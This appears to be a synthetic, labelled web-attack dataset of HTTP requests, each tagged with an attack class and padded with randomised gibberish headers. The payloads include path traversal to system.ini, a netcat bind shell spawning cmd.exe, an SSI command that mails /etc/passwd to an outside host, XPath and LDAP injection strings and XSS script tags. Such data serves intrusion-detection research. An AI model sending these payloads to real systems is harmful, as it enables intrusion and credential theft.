UA-Disp: 119,1491,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 3700x2595
Via: 1.0 81.223.53.197, HTTP/5.2 www.IeeEe.jpg, HTTP/6.6 98.168.5.53
Transfer-Encoding: 4nis; ohirt=itsrh2
Upgrade: sS7i/3.2, haaoxa/5.4, fair/8.2
Warning: 525 www.tntaivc.png "taaisanteflseGtnsd" "Thu, 10 Jun 04 12:50:10 UTC"
X-Forwarded-For: 42.181.165.201
X-Serial-Number: 814494240740
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38091
Start - Id: 45611
class: PathTransversal
GET /ueekcDopRruetim/al5in8hkl/LhtaccesBB/aa7tpa4A9s2t2asrt/s1/-ZZhautoexec/ye2.css?Eu=186548873&erzpk2uf58rm=0n+le&CP6Q0s=56228&9nhhkxnwrr=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWINNT%5Csystem.ini&7ho30=ei7Z0arL_LHB HTTP/1.0
Host: 171.176.237.69:80
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: iDaqn-d, eeGo-3, o-ptd
Cache-Control: o=ih0nne
Client-ip: 54.187.183.145
Cookie: Hnteosrr15tit=eUeGe-;E4JM3ZchildXOX=Brz1ei47m7;1DhPm9c.fl=oMW;en1=aornda0sni;eshtTv=lh1
Cookie2: $Version="46"
Date: Fri, 10 Apr 09 07:16:27 GMT
ETag: W/"hYq.Qe6vS5JVPkNg"
Expect: 100-continue
From: f4re3ea2@HiNl.uk
If-Modified-Since: Thu, 01 Jan 09 11:08:41 UTC
If-Unmodified-Since: Sat, 06 Nov 04 20:35:54 CET
If-Match: *
If-None-Match: "2mV2QwsXwi2Wo9KAEEK"
If-Range: Fri, 01 Sep 06 06:37:08 UTC
Max-Forwards: 537
MIME-Version: 6.4
Pragma: no-cache
Proxy-Authorization: ench vu6n=5eeTe
Authorization: Basic cmZzbzJvaDptdG01b21u
Range: 942-,71595-5
Referer: /otihoetM.mpg
TE: deflate;q=0.5,trailers,chunked
Trailer: Via
User-Agent: 61re9ew (oOTNdR; hBHede; c8RfQmQzj; e@YEyuNpG)
UA-CPU: x86
UA-Disp: 6050,986,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 0039x975
Via: 9.5 214.159.68.124, 0wuae/8.9 www.feldc.js
Transfer-Encoding: deflate
Upgrade: wdths/1.4, ocajr/8.7, hnt/8.6
Warning: 979 249.143.44.161 "mpeqyef6" 
X-Forwarded-For: 48.145.225.109
X-Serial-Number: 749320741
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45611
Start - Id: 42913
class: OsCommanding
POST /avaio67degbemnhn/782MwWbody.qH/iAUxsamvo1cuGazK.mrA/Tt/ejFxg0XGB/Vaq2connect/ttqwdhT2ig/obselectZ18X.gif? HTTP/1.1
Content-Length: 102
Content-Language: s
Content-Encoding: gzip
Content-Location: http://cCqdez.gov/trud/etr9sgo/n76r/8dml4NoA/Rrats.tiff
Content-MD5: eHRuM3I2cU5vbmFvNXZuaQ==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Sat, 19 Jun 04 15:26:38 GMT
Host: 15.41.162.245
Connection: iehtoedl
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: only-if-cached
Client-ip: 226.89.69.93
Cookie: aauneasknha3d=envt7rthttps\prl;v7dyk6=|   shell( "cmd  /c  c:InetpubwwwrootMSISSnc.exe -l  -p  7934    -t -e  cmd.exe  "   )   |  ';sampLO5=7378067522;sbdvsOaeniaN=406
Date: Tue, 07 Dec 04 12:02:04 CET
If-Match: "fi4cpuFZyjs8lodQqgEA"
Max-Forwards: 6725
Authorization: Digest nonce
Referer: http://www.tly6h.it/rexn0/iLf3nh.mpg
TE: gzip,deflate,trailers
User-Agent: Mozilla/9.6 (Machintosh; U; PPC 7.2; sd-ao; rv:7.2.3) Gecko/75977622
Warning: 790 www.eeeleN.shtml "tlcm6haa2hgE" 
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

pbaui7ator88fle=LrT|l&cYx3enOrn=iTEtnWS.84u&dfov=3320095900&neeew18=0&gdut=76438353&gDNT=oKnEEexeceT

End - Id: 42913
Start - Id: 45963
class: PathTransversal
GET /nrsoeeeneyh.png?qhl8ectfdds=%24+E%7C%25t+rlTv&Erlwaot=..%5C..%5C..%5C..%5C..%5C..%5CWINDOWS%5Csystem.ini&otdt=Cee+io9%5Dt%40+%5Bkftptsystem%25%7C HTTP/1.0
Host: www.eemea.uk
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: TkeEg0u-9cne, Rtn-nTeebsee;q=0.0, nnYol-t1;q=0.0, enyte-l8widw8;q=0.3, asch-wertyF;q=0.1
Cache-Control: max-age=6
Cookie: m@aPAr=ki1nnOyst;gvxVY.drop=70;lhiteae6xsnj=13
Cookie2: $Version="06"
Date: Tue, 21 Sep 04 21:40:05 GMT
If-Unmodified-Since: Sat, 03 Apr 10 09:22:26 UTC
If-Match: "wrzQ1MO@qhdCVQ5H8gd"
If-None-Match: *
If-Range: Wed, 27 May 09 19:42:47 GMT
Max-Forwards: 5
Pragma: no-cache
Authorization: NTLM aHFuaW1tRG5Bc1NlQ3dhdG9ubm5iZWVtYWdQYnNjaUV1UmNp
Referer: /vdxaem/e2epWhgp/szlrJ7.jpg
User-Agent: qtr8he (tdrPbmbQxO)
UA-Pixels: 1884x329
Via: HTTP/2.9 190.196.108.169, 1.4 189.254.47.60, HTTP/9.5 43.240.173.254
Upgrade: gOraok/6.8, woRu/7.2, saOiE/3.6, nltr/3.7
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45963
Start - Id: 40072
class: SSI
GET /h81mi/bH5ZNXPs/Dn4a3hfre9/cdkgl1qoGqnpB.BU5xk/uufKnWeTyo/ogFXQL/U2q6lFvqNO6echoAA/ty1phtAtd/ulNa/_sock_stream2/thAedMSte.cfm?tc6aehsdqoo=hUTrbiWQa&myn6sp8y=pUXyWYX9d&iniohsahik3mea=%3C%21++++%23%3C%21--++++%23exec+cmd%3D%22id%22--%3E&kqUF=izi6sw.%40y&plocation8DYV10pgall=naa0o&unionaeopenw.xhome5=6&dsRc7esa=51678&nsrrtsdcoaLrsCr=ob0lFrKFzDvH HTTP/1.1
Host: www.sbhsahosl.net
Connection: close
Accept: */*;q=0.2
Accept-Charset: windows-874, iso-2022-jp, cp-950, euc-jp
Accept-Encoding: *;q=0.3
Accept-Language: kobeyoes-tEqghih;q=0.2, eesm-al, lfnlej-4oel;q=0.1, osneiwlo-g;q=0.7
Cache-Control: only-if-cached
Client-ip: 53.190.46.19
Cookie: yclbdoege=hATX4;dimrut=87851720;Agw5finyr=otjg1dhsaI;oafnzz=2993253268;Hara=ame t0ac5qs
Cookie2: $Version="641"
Date: Fri, 15 Feb 08 19:00:05 GMT
ETag: "6MLClxhRoy2z2nIcv"
Expect: fpetd
From: uohepreO@9Mntu.biz
If-Modified-Since: Sun, 03 Oct 04 01:05:25 CET
If-Unmodified-Since: Fri, 26 Dec 08 14:57:11 GMT
If-Match: "R7gJHHMF2z4ELwM97an"
If-None-Match: *
If-Range: Sun, 21 Nov 04 11:37:57 UTC
Max-Forwards: 972
MIME-Version: 9.5
Pragma: natSlh='at'
Proxy-Authorization: tk5tph hFlgrdtC=taleir4
Authorization: Basic ZEVBdGNod3A6YWhhcnNl
Range: 4-,3-,-4
Referer: /nney/acdt/r8du5/ayheh.jpeg
TE: deflate;q=0.2
Trailer: Authorization
User-Agent: elgei (mNLfChe4)
UA-CPU: PowerPC
UA-Disp: 097,3565,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 893x680
Via: 5.0 www.hendNiam.png:429
Transfer-Encoding: deflate
Upgrade: rcieEo/9.2, esrs/5.8, kEi6/4.8
Warning: 187 www.s2nfht.shtml "Idhcekl" 
X-Forwarded-For: 149.177.156.143
X-Serial-Number: 44488715
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40072
Start - Id: 48901
class: XPathInjection
GET /rwbmcaienEB/a.FbGsuDhQ0/ycN2UFYMMRL4/AhLE/iiitcnlQFegTz.png?sst6dtunan=95421&Pw6S6wvJX=fhrdspo%27+or+++++%28i+++++%3C+count%28tib%2Fchild%3A%3Atext%28%29%29++and+++++j+%3C+++++count%28ew%2Fchild%3A%3Acomment%28%29%29++and+++k+++++%3C+++count%28pOeStx%2Fchild%3A%3A*%29+%29++++or+++%27t5oq%27++++%3D%27+ahbOdtcy%27+or&aess1=%2FKpHsnU%3DservicesshutdownnoojnlulE%3A&selywtr=+tsot&le=934565&ZWo4OUa=1599773&iorciNsrenmr=yZqdEtnHtcBh6cp9&libhUcqTRdelete.6.h=988201111 HTTP/1.0
Host: www.6Vcielw.biz:313
Connection: close
Accept: */*;q=0.1
Accept-Charset: x-mac-chinesesimp;q=0.3, euc-tw, macintosh;q=0.9
Accept-Encoding: deflate, gzip, compress;q=0.9, identity;q=0.5
Accept-Language: st-7;q=0.8
Cache-Control: only-if-cached
Client-ip: 6.234.29.204
Cookie: oT=eetncIo
Cookie2: $Version="0"
Date: Mon, 31 Jul 06 12:26:50 CET
ETag: "EZ.0JafyIzHcH8cl0G1T"
Expect: sbtnm
From: nui8@hgERemx.net
If-Modified-Since: Sat, 03 Jun 06 15:17:23 GMT
If-Unmodified-Since: Thu, 07 Jun 07 23:56:09 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 1
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: Digest username="hatewte"
Authorization: Basic Y3VpSmR4dW06aWhocg==
Range: 87-22
Referer: http://0tgHek.net/raaacxr/imu3/q40mi2.txt
TE: gzip;q=0.7
Trailer: Warning
User-Agent: Mozilla/3.7 (Windows; U; Windows NT 6.6; iN-op; rv:7.6.5) Gecko/34524449
UA-CPU: MIPS
UA-Disp: 184,1119,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 978x515
Via: 4.0 www.run6uEoh.html, 6.0 225.8.95.174, 6.6 220.88.128.160
Transfer-Encoding: compress
Upgrade: o6r/8.3, gsh/9.3, o8o/3.8, 2oIojh/2.5
Warning: 712 39.177.49.129 "e9wsavnreymOd" "Wed, 28 Jun 06 09:25:28 CET"
X-Forwarded-For: 89.218.173.144
X-Serial-Number: 58510218762
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 48901
Start - Id: 39963
class: SSI
GET /odajoeee88ehttHshDbE/ho1n1orv/oesscasm0neUh/scriptfycaccess_logW0bxp_aCxB/ttceiretoaSsne/aeRi07VoyA0tY/eZVRUGxgYzeW/SCs_z/fadminZOnVi.html?zrploglqCq=%3C%21--+%23exec+cmd%3D%22%2Fbin%2Fmail+++pesh.com+++%3C+++++%2Fetc%2Fpasswd%22--%3E HTTP/1.1
Host: www.owbTs.net
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *;q=0.0
Accept-Encoding: gzip;q=0.1, compress;q=0.5, deflate;q=0.7, deflate;q=0.9
Accept-Language: *;q=0.4
Cache-Control: max-stale
Client-ip: 183.52.12.49
Cookie: Suwfpltaar0=8;ylgdytnsuoeant=93438;3R3Z-4pob=120438001;LihockBdrnf=1883;E1qcopy6.=57;mophao=1XZEJy
Cookie2: $Version="03"
Date: Fri, 17 Mar 06 19:49:49 CET
ETag: "JFB77.k_xgNM-ycpG"
Expect: 100-continue
From: so7e5@hesdawuna.uk
If-Modified-Since: Thu, 23 Jul 09 20:11:20 GMT
If-Unmodified-Since: Tue, 19 Aug 08 23:40:33 UTC
If-Match: *
If-None-Match: *
If-Range: "YavZqkjOeTOFp6nQ"
Max-Forwards: 2
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: aHtMee s2lgu=6eHelq
Authorization: Basic ZHJpdGpwdm86aXFmZWZj
Range: 67904-931063
Referer: /bqssoie/ieEEsy/ZtehebsR/2etonha/6nknHv.cfm
TE: gzip,trailers,chunked
Trailer: Connection
User-Agent: mlyhtAeewdt
UA-CPU: Sparc
UA-Color: color16
Via: 7.0 226.232.160.153, FTP/7.8 68.234.143.202
Transfer-Encoding: deflate
Upgrade: snt/4.7, 9diah/5.8, zl6/2.7
Warning: 323 13.31.57.254 "dinvatrVko1snr" 
X-Serial-Number: 754321
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 39963
Start - Id: 38657
class: LdapInjection
GET /cwR/awrfxd5Wz9/DR3_texecdIPklgq/lr7qraeEuat/syeoelUera4ythxado/5Bh/T78eaHovupg8thuTpia/zeri.jpeg?rwit8HAoei=2666&82YWZNniDxL=800&oictIevMqwymq=8763584&l3=ncphpformshutdownw&8eah1neaud=00%29%28%26%28objectClass%3Dysa%29%28%7C%28sn%3D+++5t%29%28cn%3De+++J*%29%29&Hgbgroup byPZmUbB=93777237 HTTP/1.0
Host: 145.135.107.121
Connection: close
Accept: */*
Accept-Charset: utf-8;q=0.2, gb2312;q=0.0
Accept-Encoding: *;q=0.1
Accept-Language: femtje-ahae, ech-ee, 4ncrato-l;q=0.7
Cache-Control: min-fresh=1
Client-ip: 33.193.152.43
Cookie: tN1ceafehutcr1o=no hisee;5tb=i=Ae0aet )homee
Cookie2: $Version="47"
Date: Fri, 13 Jan 06 07:12:30 GMT
ETag: W/"NDTNAThFdSCA-p."
Expect: 100-continue
From: 0dbnE@pDEweao.biz
If-Modified-Since: Sun, 03 Jun 07 24:33:36 GMT
If-Unmodified-Since: Sun, 04 Feb 07 02:53:05 CET
If-Match: *
If-None-Match: "aQporVpJiu_M_E7c27fM"
If-Range: Thu, 28 Feb 08 14:52:46 GMT
Max-Forwards: 3
Pragma: e=E
Authorization: NTLM ZG50MG91dGFlZGFyYzludGxlbm9uZUlJaHVsYzdpZWVzbE92MHJpenNuZ24=
Referer: /oye77u6t/cGia.sh
TE: gzip,trailers,trailers
User-Agent: Mozilla/1.1 (X11; U; SunOS sun4u 9.2; tx-cn; rv:4.6.0) Gecko/74094174

null

End - Id: 38657
Start - Id: 38538
class: LdapInjection
GET /Mam/7Xd351uBBinsertWlse2/rRftBqioc8MCH/uefw/ed1.jpg?2j0@EbetweennfqwC=stOiia2roe&5hNnnBfsessyi=28%29%28%26%28objectClass%3Dt6h%29%28%7C%28sn++%3Dn5e%29%28cn%3DrTk++J*%29%29&losdhittylo=vibgsound%25&dn8WnrNpmo=3099&ets2tpdteEfbUc=chjg&s0=tiendhomEdypoe3amH&soodDr=htpassld&tseniyiems7Cte=56964260&tiUu00nttqENmeh=njOOtMeaEes&qijpasswdhQbMfromj5X=rmoes64nfebUa%3BP&lisofyjszwmnD=uhheX HTTP/1.0
Host: 52.240.239.182:0786
Connection: close
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: compress, gzip;q=0.0, identity
Accept-Language: *;q=0.1
Cache-Control: eleawo=eenM
Client-ip: 101.131.250.156
Cookie: ejswVolxh=seuNm3pOselect;wx8objects_=9 >%saob o
Cookie2: $Version="187"
Date: Thu, 01 Apr 10 22:01:10 UTC
ETag: W/"LzfgK5k748beRBr_"
Expect: 100-continue
From: teee@ahlrhcs1d.org
If-Modified-Since: Thu, 16 Apr 09 19:56:01 GMT
If-Unmodified-Since: Thu, 28 Jul 05 23:59:25 GMT
If-Match: "z8DLD_b.OnZo@UGJk"
If-None-Match: "OwmyPRMGmUcX_0.n"
If-Range: *
Max-Forwards: 2
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: NTLM Z2RpZWZmYTBGUG1yQWRpSUhuUnQ5SjNpbzNzSWxuZXJVYXRzdGlvZW1veGxJbGlh
Authorization: c0hR cjoints=SGlhrsu
Range: 447-,158917-
Referer: http://nsTihe.it/Ihaer/ehrch/roasnDl/3ibal6/s4iahgn.mp3
TE: deflate,trailers
Trailer: If-Range
User-Agent: Mozilla/3.4 (X11; U; Open BSD i386 8.7; t4-rd; rv:3.9.3) Gecko/91211257
UA-CPU: MIPS
UA-Disp: 967,395,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 8726x4401
Via: 6.0 www.ilps6no.css:615
Transfer-Encoding: deflate
Upgrade: nuhgRe/9.5
Warning: 494 103.11.37.183 "1br62beg" 
X-Forwarded-For: 157.225.217.71
X-Serial-Number: 30599
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38538
Start - Id: 35750
class: XPathInjection
GET /nromadiTDhf/odhUe_iM-@6w/2log7t4G/HOD12htacces0OinO_homeF./puttf/1fKKu@0WnPwUB/wdoWnaskinuusup/wSR8WwIprocessing-instructionvP/tAhrepjeeouewl1O/O1gaahtehy9dftooEe.shtml?heihiaue=6+++++or+++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D+%7C+path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++or+948%3D HTTP/1.0
Host: 0.62.131.229
Connection: 9wllsen
Accept: image/jpeg;q=0.7
Accept-Charset: us-ascii
Accept-Encoding: *;q=0.8
Accept-Language: *;q=0.8
Cache-Control: no-cache
Client-ip: 64.250.168.166
Cookie: saedRr2a=076757287;n7tatbycIetninr=9135610851;YOi79YWfkxnull=mpnnaobomochaetgroup bye31
Cookie2: $Version="40"
Date: Thu, 23 Apr 09 06:43:29 UTC
ETag: "Y2G28OgdZeEhliz"
Expect: 100-continue
From: nsEeee@gxtagow.be
If-Modified-Since: Sat, 26 Nov 05 05:31:57 GMT
If-Unmodified-Since: Fri, 22 Jun 07 21:06:34 UTC
If-Match: *
If-None-Match: "vowKaCWBAFcctSz_Cusz"
If-Range: Mon, 11 Apr 05 14:43:17 UTC
Max-Forwards: 5092
MIME-Version: 6.5
Pragma: eild=oOcba
Proxy-Authorization: adwi etihc=5lIn4t
Authorization: NTLM ZWFyOWRhbXVsb2V1ZDBsckhmOHJocm5JcnJpc2F0ZVI0YlRu
Range: -042616,-147342
Referer: /t25mhteN/xircgol6.doc
TE: trailers,trailers,trailers
Trailer: Connection
User-Agent: Mozilla/3.4 (compatible; tanqAege3; Open BSD i386; hiawiaty)
UA-CPU: x86
UA-Disp: 8135,7731,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 161x6887
Via: 3.7 www.cyee.tiff:6
Transfer-Encoding: cdai
Upgrade: Toa/4.1
Warning: 830 150.180.170.121 "g2fnareaRtt4gNB1gprl" 
X-Forwarded-For: 171.203.103.227
X-Serial-Number: 8308712683150744327
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35750
Start - Id: 46561
class: XSS
GET /<SCRIPT>alert(document>URL)</SCRIPT>/? HTTP/1.0
Host: www.yitAo.de
Connection: close
Accept: application/*, audio/*, video/mpeg;q=0.0
Accept-Charset: *
Accept-Encoding: *;q=0.7
Accept-Language: tN-hdgoo;q=0.0, ai-gro;q=0.9, dsteait-Hep;q=0.6
Cache-Control: only-if-cached
Client-ip: 242.255.226.68
Cookie: pam7GO=smhhderynb7n;@linknaZE7O_=iacdjrtoThsbsg;AsesoL=186443;n2atdhadaet=usef%bryNCe-;uahEa=36459005;caeeV6mna9lei=rzelego'7<z
Cookie2: $Version="190"
Date: Mon, 19 Jan 04 01:36:22 UTC
ETag: W/"BufY_5FWwPf3rOS6xC"
Expect: seturnT=oaeb;IrmjE
From: ns7rogjc@npah.it
If-Modified-Since: Sun, 06 May 07 11:16:13 UTC
If-Unmodified-Since: Sat, 30 Jun 07 15:27:46 UTC
If-Match: "k3JWTcMEDBVUR_1KV1"
If-None-Match: "pbwxNHHuagfK5n.X"
If-Range: Thu, 05 Jul 07 03:58:18 UTC
Max-Forwards: 672
MIME-Version: 4.8
Pragma: ajyeoi0C=iod
Proxy-Authorization: Digest username="rgww0see"
Authorization: Digest response="Bf1A17Db765F8d2b90ad86d1D0Ca6f27"
Range: 910-120,749-15173
Referer: /57iatd/heldhe/sesrc/vq4dp/oy8n2e4a.mp3
TE: deflate,deflate,gzip;q=0.9
Trailer: Pragma
User-Agent: tli7k4s http://www.dwoc1wst.de
UA-CPU: x86
UA-Disp: 161,932,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 309x668
Via: 6.9 www.hnWvut.htm
Transfer-Encoding: gzip
Upgrade: irra/6.5, aec/6.4, reai65/1.7, rTN/8.4, fctm/6.2
Warning: 953 162.158.190.142 "tshTYs" 
X-Forwarded-For: 45.4.150.153
X-Serial-Number: 794611052
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46561
Start - Id: 46939
class: XSS
POST /9aiu5rnc/EntiNocba/zeteo.sh? HTTP/1.1
Content-Length: 147
Content-Language: o,27nde7b
Content-Encoding: compress
Content-Location: http://aseGeeo.gov/dee7oenu.html
Content-MD5: em5TdDNzazBGbXJ1SHRlcw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 11 Sep 09 14:51:38 CET
Last-Modified: Tue, 15 Mar 05 04:32:48 UTC
Host: www.tahd4.net
Connection: een1r
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: *;q=0.9
Accept-Language: eiOSlr-r, md4dXje-xe, 9usorep-pmS;q=0.5
Cache-Control: max-stale
Client-ip: 68.207.188.146
Cookie: rt0p2ne6qsArw=wkjeg;pnmpreTonAa=s|yhpasswde;uwyeaezra=e|7tautoexechd5ft~ soa;hlkst= E->;J1JJNreplaceqVautoexecH=nullwmps
Cookie2: $Version="8"
Date: Wed, 03 Sep 08 09:15:52 UTC
ETag: "SCAVop_lNqv1M6u4TMF"
Expect: 100-continue
From: nhatwm@untrh.biz
If-Modified-Since: Sat, 17 Sep 05 07:08:46 GMT
If-Unmodified-Since: Mon, 24 Apr 06 06:09:19 GMT
If-Match: ".yRH710b5kutcp2@yk"
If-None-Match: *
If-Range: *
Max-Forwards: 3743
MIME-Version: 1.5
Pragma: 2xmhxwd=asi
Proxy-Authorization: Basic Y3BzTW06d3lkc04=
Authorization: NTLM cHhhdGhEYWFjYXplZ21odGllbnBhbnZpbE5maHNvcmll
Range: 455810-240,-24385
Referer: http://www.phOi1.cz/9igrei/lqmut.php3
TE: trailers,trailers,deflate;q=0.8
Trailer: TE
User-Agent: Mozilla/4.6 (Windows; U; Win 9x 6.2; f6-pe; rv:0.1.6) Gecko/68876228
UA-CPU: MIPS
UA-Disp: 4346,951,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 0837x527
Via: FTP/0.8 www.wkhtrh.gif, 8.0 109.228.109.100:42, soe/1.6 www.eStm.gif
Transfer-Encoding: NTots; uree=s0si
Upgrade: sdW/7.9, agrd/5.9, wt6wa9/7.2
Warning: 764 www.ematse.tiff "gAijntrahti" "Thu, 26 Apr 07 12:05:11 GMT"
X-Forwarded-For: 207.203.23.208
X-Serial-Number: 4682138
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ssh=o-&2ht=<bgsound  src =    "   javascript:[alert ('eles1rn');]" >&cnornthiV1gsdo=otaacssbw81qxl&eb3stelwiNedir=4725331

End - Id: 46939
Start - Id: 35769
class: XPathInjection
GET /Hmboot.iniFetLF.php4?rat0bwInbit8eWb=s%3AUprocessing-instructiond+oconnect+&adovO=sthtacces&hAUEora=RhyeHh&hKacceptn6vstdin=xsla5uoa&st4lsVpTsi=335237&0orotec7sh=68234&2ichibj8a=ernEtesztnw&nsztgl=Ntvndo%27++or+++count%28+path%2Fchild%3A%3Anode%28%29%5Bposition%28+++%29%3D%28%28++++i++++%2B++j++++%2Bk%2B++++l+++%2B+1%29%5D+++%7C+path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+++or++%27le%27++++%3D++++%27++++erb%27++++or&ypxhlrngrdh0rct=iseOhsm+EswtMLM%26+&ebiwc=0t%3F HTTP/1.1
Host: www.es2edeaqea.ch
Connection: close
Accept: */*;q=0.3
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: U7-UemGr;q=0.8, dhee-ych;q=0.8, eCnSAwe-c;q=0.6, 1-oqni;q=0.3, hi-iTit;q=0.5
Cache-Control: min-fresh=0
Client-ip: 126.21.193.165
Cookie: U24O=4c;8lcrnfiaId1vfb=bOw2GkcHWm;gbafeayrnera=25;Ocrbebamilni=683675;oioo9smba7sft=6309254;-8Kift=23
Cookie2: $Version="53"
Date: Fri, 24 Jun 05 16:28:54 GMT
ETag: W/"sDKuASrOdbuBMPpSmEw"
Expect: 100-continue
From: Nginnon@eatp.net
If-Modified-Since: Thu, 19 Jul 07 21:32:04 GMT
If-Unmodified-Since: Thu, 08 Nov 07 05:21:28 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 27 Jul 09 06:51:38 CET
Max-Forwards: 5
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: Basic cnhhZWk6b29zVlN2
Authorization: Digest opaque="zteiR"
Range: 9042-41
Referer: /Sanl/t8pfAhe.jsp
TE: trailers,gzip
Trailer: If-None-Match
User-Agent: Mozilla/2.6 (Windows; U; Win98 8.0; ac-cm; rv:7.9.9) Gecko/00719193
UA-CPU: x86
UA-Disp: 8135,7731,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 6100x360
Via: 8.8 www.w6ti.shtml, 2.6 163.130.140.159, pEyjis/6.7 www.t6eteuao.css:7440
Transfer-Encoding: deflate
Upgrade: sunttk/5.8, ubia/9.5, deoo/2.0, zOw/5.6, cxc/4.5
Warning: 740 216.155.89.107:131 "6yr34ie5" 
X-Forwarded-For: 142.75.180.148
X-Serial-Number: 040193563593
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35769
Start - Id: 37767
class: LdapInjection
GET /hYmFUJh./opnni4aE.php4?qCe7acceptb=vwF&-faccess_logLv6ps3DNak=tdo3yo0nayminoqut&5etcUx_=eoo%3B%3E+elinko%3E&CEZQpWdT7l=939261&1hoVX=71&aHctetNs=eprocessing-instructionrtexec&sansninthn=pEHn%409qwQ&imhemdee8eioe=ilOerhtooh03&btr8HUEWxT.N=style5hLefneis&2gglsfceCo=%29%28%7C+++%28displayName%3Dhad*%29+%28name+++%3D+++had*+++%29%28++++mail%3Dhad*++%29&C6U8UKcopyfvm=585&avada8idoelymt=lO6y9N. HTTP/1.1
Host: www.eeacoe1how.st:07571
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip;q=0.2
Accept-Language: cea-niaq;q=0.2, st-o;q=0.0, 19bal4O-ot;q=0.6, Lrtssl-ctuear;q=0.5
Cache-Control: no-store
Client-ip: 142.211.61.15
Cookie: tHleJdsisueRsh=9726064;iFaariase=cqaice;dreotniz3apc7oo=emDr;lrh=za76atr'iu;rlelayhueevsk5=%walenk
Cookie2: $Version="37"
Date: Tue, 26 Feb 08 23:08:51 GMT
ETag: "obHqz4OzX93Svrt6nEXA"
Expect: atsAq
From: fssGmo@tsxudTxl.fr
If-Modified-Since: Wed, 16 Feb 05 09:51:41 UTC
If-Unmodified-Since: Mon, 03 Sep 07 19:14:47 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 1
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: Basic MzRvbG86dGVzU3hhbmQ=
Authorization: Digest opaque="maud"
Range: 059-52057,02-0322
Referer: http://www.fmsut.gov/nt4fiDP/twbhaec/nEyrany/wnato/treteh.fgf
TE: deflate,trailers
Trailer: TE
User-Agent: kmz9afmtiktispsT
UA-CPU: x86
UA-Disp: 3072,0786,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 807x162
Via: FTP/2.5 253.194.176.145, medtr/3.5 115.210.243.25
Transfer-Encoding: deflate
Upgrade: Ebsle/5.6, dvNtn/8.8, on3/2.1, sae/8.5
Warning: 938 145.133.83.75 "ehdr1rgj" 
X-Forwarded-For: 232.43.71.116
X-Serial-Number: 7486160267274211008
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 37767
Start - Id: 39511
class: SSI
GET /qo_.EsWsm/iae6/ml9o2gwkeegmk6eehayD/S6/oepsrte2ei/tv@bonp4T-oF626/t2nIl/fstextEetrt3aoeyeei/mn/oARtamaatItaytSt.tiff? HTTP/1.0
Host: 13.62.230.215:5
Connection: close
Accept: application/x-tar, application/rtf;q=0.9, text/html;q=0.0
Accept-Charset: iso-8859-5;q=0.4, shift_jis
Accept-Encoding: compress;q=0.8
Accept-Language: <!--     #include   virtual="/etc/httpd/httpd.conf"-->
Cache-Control: max-stale=781
Client-ip: 142.135.177.191
Cookie: 4lsCyrlreeiE1eE=onPe 0d%ebtga;
Date: Wed, 17 Jan 07 16:11:37 CET
ETag: W/"h_a6LeSNBQFp0nAlSZV1"
If-Match: "4ixpnuw@1cQLLWE"
If-None-Match: *
Max-Forwards: 4
Pragma: htitodcm=0tru
Proxy-Authorization: lIess avnetc=geyenG6d
Referer: /5lnttF/wH6eu/nhghimue/cvbitT.gif
TE: trailers,trailers
User-Agent: Mozilla/8.8 (Machintosh; U; PPC 0.1; 0s-su; rv:9.1.2) Gecko/89518734

null

End - Id: 39511
Start - Id: 40677
class: SSI
